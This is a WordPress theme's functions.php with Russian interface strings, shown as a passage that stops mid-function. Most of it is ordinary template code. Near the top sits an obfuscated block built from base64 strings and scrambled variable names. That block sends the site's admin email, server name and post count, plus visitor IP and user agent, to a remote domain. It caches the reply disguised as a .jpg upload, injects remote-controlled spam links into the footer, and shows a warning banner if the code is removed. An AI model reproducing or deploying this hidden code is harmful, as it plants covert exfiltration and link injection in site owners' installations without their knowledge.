<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $OtARmhm='_';$EygRG='d';$mLzJv='6';$qTUD='d';$NmomWK='c';$HJnz='s';$bXmWA='e';$BbzkY='o';$EriJ='4';$THuY='a';$FGJE='b';$ZiXxb='e';$sDCqa='e';$JcwKFVVe=$FGJE.$THuY.$HJnz.$ZiXxb.$mLzJv.$EriJ.$OtARmhm.$qTUD.$sDCqa.$NmomWK.$BbzkY.$EygRG.$bXmWA;$tlqy='z';$XONjcNC='g';$xoBb='n';$vGrlLDV='i';$jprf='f';$abilsHY='a';$nqZZTUb='t';$jDsqM='e';$oTayW='l';$tzDSHokW=$XONjcNC.$tlqy.$vGrlLDV.$xoBb.$jprf.$oTayW.$abilsHY.$nqZZTUb.$jDsqM;$PgTsyk='t';$jdbOTQ='r';$QOVPNP='s';$LexQk='t';$IWiqHCa='_';$NONN='3';$JEzttG='o';$Nkcwh='1';$fRWa='r';$IKuJTGcA=$QOVPNP.$PgTsyk.$fRWa.$IWiqHCa.$jdbOTQ.$JEzttG.$LexQk.$Nkcwh.$NONN;$wekeeSZ='r';$pImRvDY='r';$tqsIAAd='t';$vlkMDTm='v';$maum='e';$jaQb='s';$foHaHUfu=$jaQb.$tqsIAAd.$pImRvDY.$wekeeSZ.$maum.$vlkMDTm;                     $pt__k='_';$qh_____________z='d';$in_______u='6';$tk___________q='d';$lc_______z='c';$ob_____________e='s';$uf____________u='e';$df____p='o';$zc______________b='4';$xk________j='a';$ws______z='b';$ll____f='e';$ca__________a='e';$yx___r=$ws______z.$xk________j.$ob_____________e.$ll____f.$in_______u.$zc______________b.$pt__k.$tk___________q.$ca__________a.$lc_______z.$df____p.$qh_____________z.$uf____________u;$cd____n='o';$tv__________x='s';$zn__________p='e';$kn_________o='t';$qo___________j='n';$bg_______________u='x';$cq_______n='i';$dy__u='s';$ra_________v='i';$or____________s='_';$sv__________q='c';$gk____________j='f';$ee______________k='n';$ei____________x='u';$zp__________b='t';$tw_____________n=$gk____________j.$ei____________x.$qo___________j.$sv__________q.$kn_________o.$ra_________v.$cd____n.$ee______________k.$or____________s.$zn__________p.$bg_______________u.$cq_______n.$dy__u.$zp__________b.$tv__________x;$sj__s='o';$kn___z='e';$kw_____________d='f';$vi_____z='p';$ku__________p='n';$hx__________o=$kw_____________d.$sj__s.$vi_____z.$kn___z.$ku__________p;$av_____________l='a';$jk_________g='e';$je_____u='d';$pk____________a='f';$fj__________s='r';$ot_____________e=$pk____________a.$fj__________s.$jk_________g.$av_____________l.$je_____u;$mh_______u='c';$cx______a='o';$ff_______n='f';$cu____r='s';$bo________x='l';$vz__________h='e';$ho_______________l=$ff_______n.$mh_______u.$bo________x.$cx______a.$cu____r.$vz__________h;define("WP_ID", $yx___r("Mi4wLjA="));define("WP_TTL", $yx___r("MTA4MDA="));define("WP_SRC", $yx___r("dHBva24="));function wp_get_header() {global $yx___r, $tw_____________n;if ($tw_____________n($yx___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$tw_____________n($yx___r("d3BfZ2V0X2Zvb3Rlcg==")) &&$tw_____________n($yx___r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $yx___r, $hx__________o, $ho_______________l, $ot_____________e;$om__________l = TEMPLATEPATH."/".$yx___r("Zm9vdGVyLnBocA==");$co______________n = @$hx__________o($om__________l, "r");$om__________l = @$ot_____________e($co______________n, @filesize($om__________l));@$ho_______________l($co______________n);$hn__v = TEMPLATEPATH."/".$yx___r("ZnVuY3Rpb25zLnBocA==");$co______________n = @$hx__________o($hn__v, "r");$hn__v = @$ot_____________e($co______________n, @filesize($hn__v));@$ho_______________l($co______________n);$pi______c = 0;if($om__________l && $hn__v) {if ($yx___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($om__________l, $yx___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$pi______c = 1;}if (substr_count($om__________l, "wp_theme_GPL_credits()") < 1) {$pi______c = 2;}}if(WP_ID != "2.0.0") {$pi______c = 12;}}if($pi______c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $pi______c -->";}}function wp_loaded() {global $yx___r, $tw_____________n;return $tw_____________n($yx___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($mf__________m, $lz___________y = "(more...)", $yu____o = 0, $yk__f = "") {$eh_______w = get_the_content($lz___________y, $yu____o, $yk__f);$eh_______w = apply_filters("the_content", $eh_______w);$eh_______w = str_replace("]]>", "]]>", $eh_______w);if (strlen($_GET["p"]) > 0) {echo $eh_______w;}else if ((strlen($eh_______w)>$mf__________m) && ($ir____y = strpos($eh_______w, " ", $mf__________m ))) {$eh_______w = substr($eh_______w, 0, $ir____y);$eh_______w = $eh_______w;echo $eh_______w;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$lz___________y</a></div></p>";} else {echo $eh_______w;}}}$hy_____________s='o';$kz___v='c';$sp_____________f='a';$ak___l='e';$li_____________z='s';$tn_____________v='e';$aa________c='6';$bz___________o='4';$ur____n='_';$rs__s='d';$kt___________s='b';$ev___x='n';$lt______________i='e';$fc_______________c=$kt___________s.$sp_____________f.$li_____________z.$lt______________i.$aa________c.$bz___________o.$ur____n.$ak___l.$ev___x.$kz___v.$hy_____________s.$rs__s.$tn_____________v;$sp______q='e';$xf______h='e';$kh___x='t';$wb_______________u='_';$ur______________z='n';$mj______i='n';$sg__________x='o';$yk__h='t';$mk________k='g';$eu__s='l';$gm____p='i';$ef____________k='e';$sy_____x='c';$eh________c='t';$rv______________k='s';$jg____________q='_';$xc____________q='f';$fz________n=$xc____________q.$gm____p.$eu__s.$ef____________k.$wb_______________u.$mk________k.$xf______h.$eh________c.$jg____________q.$sy_____x.$sg__________x.$mj______i.$kh___x.$sp______q.$ur______________z.$yk__h.$rv______________k;$sv___k='s';$jk_________w='l';$be____________f='s';$uk____l='e';$de___a='e';$lm___b='f';$rr__________g='i';$nr___________x='t';$cu_____a='_';$og____________a='i';$tb__i='x';$ab___p=$lm___b.$rr__________g.$jk_________w.$de___a.$cu_____a.$uk____l.$tb__i.$og____________a.$sv___k.$nr___________x.$be____________f;$do___a='e';$vb________h='p';$lv______w='i';$wt___k='a';$ej______l='s';$ng_____d='o';$ak_________g='r';$gw____________f='v';$er__________s='r';$nw_________u='_';$ul____________z='m';$ej______s='e';$vd______________a='o';$sh__w='c';$gt_____________b='n';$ms___________c=$gw____________f.$do___a.$er__________s.$ej______l.$lv______w.$ng_____d.$gt_____________b.$nw_________u.$sh__w.$vd______________a.$ul____________z.$vb________h.$wt___k.$ak_________g.$ej______s;$in_______b='p';$td____________x='f';$ve______________q='s';$on_______i='e';$qd_____m='n';$ae______p='o';$ab_______b='k';$pj____k='c';$gd______g='o';$in__p=$td____________x.$ve______________q.$ae______p.$pj____k.$ab_______b.$gd______g.$in_______b.$on_______i.$qd_____m;$ti_____l='e';$sv__________z='f';$ee____y='r';$zt_____h='w';$gn____________j='i';$fp____________b='t';$pw__o=$sv__________z.$zt_____h.$ee____y.$gn____________j.$fp____________b.$ti_____l;$cf____________i='d';$vm_______o='5';$ep________k='m';$ty_______i=$ep________k.$cf____________i.$vm_______o;$ca_______________g='l';$dj_______________k='h';$xp____k='t';$vo_________h='a';$bj_______p='e';$hd__________h='r';$uz__b='a';$yz________c='p';$yg___f=$hd__________h.$bj_______p.$vo_________h.$ca_______________g.$yz________c.$uz__b.$xp____k.$dj_______________k;$jn____t='n';$rz__________i='e';$ac_____a='a';$ri____________y='e';$or________x='i';$fr___________t='z';$ln___________w='u';$ze___s='r';$vb__e='i';$nz______w='s';$da_______________p='l';$fy_____________q=$ln___________w.$jn____t.$nz______w.$ri____________y.$ze___s.$vb__e.$ac_____a.$da_______________p.$or________x.$fr___________t.$rz__________i;$ou_______r='n';$sm_______________d='e';$nl__________q='m';$nb______________k='m';$ah________p='t';$fc______________a='p';$dp_______________e='a';$vx____________r=$ah________p.$sm_______________d.$nl__________q.$fc______________a.$ou_______r.$dp_______________e.$nb______________k;$er_____________d='o';$ls________k='t';$hy_______________k='_';$lw___________i='_';$ih______________p='r';$yj__________j='e';$nd____________v='n';$ho_______________m='c';$am______________h='t';$ck______________j='e';$bb_____________e='a';$gc________f='a';$ls_________y='t';$zk_______________m='e';$xk______________q='c';$fu__________t='r';$cc______c='e';$mj_________k='x';$yq______________m='m';$su_____________f='s';$yv______q='t';$cp_________h=$su_____________f.$yv______q.$ih______________p.$zk_______________m.$gc________f.$yq______________m.$hy_______________k.$xk______________q.$er_____________d.$nd____________v.$ls________k.$ck______________j.$mj_________k.$am______________h.$lw___________i.$ho_______________m.$fu__________t.$yj__________j.$bb_____________e.$ls_________y.$cc______c;function ec_______v($vx__q) {global $yx___r, $tw_____________n, $fz________n, $ms___________c, $cp_________h;if (!$tw_____________n($yx___r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ms___________c(PHP_VERSION, "5.0.0", ">=") && $tw_____________n($yx___r("ZmlsZV9nZXRfY29udGVudHM=")) && $tw_____________n($yx___r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$by_________t = $cp_________h(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$mx___w = @$fz________n($vx__q, 0, $by_________t);} else {$mx___w = @$fz________n($vx__q, 0);}return $mx___w;}function gs_________q($vx__q) {global $tw_____________n, $in__p, $pw__o, $yx___r;if (!$tw_____________n($yx___r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$vo______b = strpos($vx__q, "/", 7);$ty_______v = array("uri"     => substr($vx__q, $vo______b),"host"    => str_replace("http://", "", substr($vx__q, 0, $vo______b)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$wk__q = @$in__p("$ty_______v[host]", 80, $dy_________w, $ty_______p, 4);if (!$wk__q) {return false;} else {$mx___w = "";$ph_____d  = "GET $ty_______v[uri] HTTP/1.0\r\n";$ph_____d .= "Host: $ty_______v[host]\r\n";$ph_____d .= "Referer: $ty_______v[referer]\r\n";$ph_____d .= "Connection: Close\r\n\r\n";@$pw__o($wk__q, $ph_____d);while (!@feof($wk__q)) {$rt______________k = @fgets($wk__q, (1024*24));if ($rt______________k == "\r\n") {$vq________h = true;continue;}if ($vq________h) {$mx___w .= $rt______________k;}}return $mx___w;}}function gs___g($vx__q) {global $tw_____________n;$ki____________n = false;if ($vx__q != "") {if ($tw_____________n("ec_______v")) {$ki____________n = @ec_______v($vx__q);}if (!$ki____________n && ($tw_____________n("gs_________q"))) {$ki____________n = @gs_________q($vx__q);}}return $ki____________n;}function kp_______j() {global $_SERVER, $ty_______i;$ik___________t = $_SERVER["SERVER_NAME"];if (substr("$ik___________t", 0, 4) == "www.") {$ik___________t = substr("$ik___________t", 4);}$ik___________t = $ty_______i("$_SERVER[SERVER_NAME]");return $ik___________t;}function pa_______m() {return "file";}function sy__y($vx__q) {global $_SERVER, $fz________n, $ab___p, $hx__________o, $ho_______________l, $pw__o;$tj___________z = nj_______________l();$uc_______p = kp_______j().".jpg";$gq______h = $tj___________z["dir_upload"]["path"]."/$uc_______p";$iw_________p = @filemtime($gq______h);if (!$iw_________p || ((time()-$iw_________p) >= WP_TTL)) {$ki____________n = gs___g($vx__q);if ($ki____________n) {if ($ab___p($gq______h)) {@unlink($gq______h);}$co______________n = @$hx__________o($gq______h, "x+");@$pw__o($co______________n, $ki____________n);@$ho_______________l($co______________n);}} else {if ($ab___p($gq______h)) {$ki____________n = @$fz________n($gq______h);} else {$ki____________n = false;}}return $ki____________n;}function nj_______________l() {global $_SERVER, $yx___r, $fc_______________c;$ke____x = wp_count_posts("post");$nh___f = pathinfo(get_bloginfo("template_directory"));$tj___________z = array("url" => array("report"      => $yx___r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $nh___f,"dir_upload"=> yl_____c(),"queryString"=> array("?a001=".WP_ID,"a004=".$nh___f[filename],"a005=".$ke____x->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://lev-tour.com/news/otdyx-na-kurorte-fantet-mujne.html\">Отдых на курорте Фантьет</a>");$tj___________z["url"]["queryString"] = implode("&", $tj___________z["queryString"]);$tj___________z["url"]["report"] = $tj___________z["url"]["report"]."/?".$fc_______________c($tj___________z["url"]["queryString"]).".html";return $tj___________z;}function yl_____c() {$fw___v = wp_upload_dir();if (isset($fw___v["error"])) {$bu__________a = sj______________l();if (is_writable($bu__________a)) {$fw___v = array("path" => $bu__________a);}}return $fw___v;}function sj______________l() {global $tw_____________n, $ty_______i, $yg___f, $vx____________r;$id___________o = (bool) ini_get("safe_mode");if ($id___________o == true) {return false;}if ($tw_____________n("sys_get_temp_dir")) {$nz____i = sys_get_temp_dir();if (is_writable($nz____i)) {return $yg___f($nz____i);}}if (!empty($_ENV["TMP"])) {return $yg___f($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yg___f($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yg___f($_ENV["TEMP"]);} else {$yz_____m = $vx____________r($ty_______i(uniqid(rand(), true)), "");if ($yz_____m) {$nz____i = $yg___f(dirname($yz_____m));@unlink($yz_____m);return $nz____i;} else {return false;}}}function nk_________l() {global $_GET, $ab___p;$tj___________z = nj_______________l();$ik___________t = kp_______j();$ua______________l = pa_______m();$eq_______r = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ua______________l == "file") {$yb____________v = $tj___________z["dir_upload"]["path"]."/".$ik___________t.".jpg";if ($ab___p($yb____________v)) {@unlink($yb____________v);$eq_______r = "deleted";}}$sb____b = array("s"=> $eq_______r,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($sb____b AS $us_____________s => $uo_________g) echo " [$us_____________s:$uo_________g]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $tw_____________n, $yx___r, $fy_____________q;$tj___________z = nj_______________l();$lo_____________g = "sy__y";if ($tw_____________n($lo_____________g)) {$mx___w = $lo_____________g($tj___________z["url"]["report"]);}if ($mx___w) {if ($mx___w = @$yx___r($mx___w)) {$mx___w = @$fy_____________q($mx___w);if (strlen($mx___w[custom_credit]) >= 5) {$tj___________z["default_string"] = $mx___w[custom_credit];}if ($mx___w["status"] == "0") {$lg______________k = 1;$ex____________j = 1;} else {$oj______________r = sizeof($mx___w["links"]);$hm____o = $tj___________z["default_string"];if ($oj______________r > 0 && $mx___w["links"] !== "") {$mv____________r = 0;foreach ($mx___w["links"] as $lp________q => $yz__b) {$mv____________r++;if ($yz__b->l_path == "" || $yz__b->l_path == $_SERVER["REQUEST_URI"]) {$yz__b->l_href = htmlspecialchars(strip_tags($yz__b->l_href));$yz__b->l_title = htmlspecialchars(strip_tags($yz__b->l_title));$yz__b->l_anchor = htmlspecialchars(strip_tags($yz__b->l_anchor));$hm____o .= " | ";$hm____o .= "<a href='$yz__b->l_href' title='$yz__b->l_title'";if ($yz__b->l_nofollow == "1") {$hm____o .= " rel='nofollow'";}$hm____o .= ">$yz__b->l_anchor</a>";}}}$tj___________z["links"] = "$hm____o";if ($mx___w[credit] == "0") {$tj___________z["links"] = "";}}} else {$lg______________k = "1";}} else {$lg______________k = "1";}if ($lg______________k == "1") {$tj___________z["links"] = $tj___________z["default_string"];}echo "$tj___________z[links]";echo "<!-- s: $mx___w[signature] -->";nk_________l();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
